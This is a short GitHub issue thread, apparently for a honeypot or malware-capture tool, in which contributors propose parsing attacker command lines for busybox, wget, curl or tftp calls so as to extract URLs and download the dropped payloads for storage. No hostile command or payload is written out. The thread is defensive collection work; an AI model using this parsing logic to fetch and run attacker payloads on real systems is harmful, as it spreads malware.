Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Extract links from the commands #5

Open
fe7ch opened this issue Nov 23, 2018 · 2 comments
Open

Extract links from the commands #5

fe7ch opened this issue Nov 23, 2018 · 2 comments

Comments

@fe7ch
Copy link
Contributor

fe7ch commented Nov 23, 2018

I've noticed that sometimes attacker is only executing some commands instead of dropping binary directly.

The commands usually includes wget/curl call, so it would be nice to parse the command line & try to download the payload.
@fe7ch
Copy link
Contributor Author

fe7ch commented Nov 23, 2018

As @HermanusF and @bontchev mentioned, this functionality should be optional, so some command line/config option should be present to disable it if needed. Imho it should be turned on by default.

@bontchev
Copy link
Contributor

Indeed. I was thinking of the following: split the input line by the semicolon character, for each part, check if it begins with (optionally) busybox , followed by wget, curl or tftp. Then extract the URL from the command (this is particularly hard for tftp; the others can be handled just with a regular expression), download the file (optionally) and save it in the usual format (file name derived from the hash of its contents). Maybe log if download was successful (e.g., it might fail if the repository from where it tries to download no longer exists).

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@bontchev @fe7ch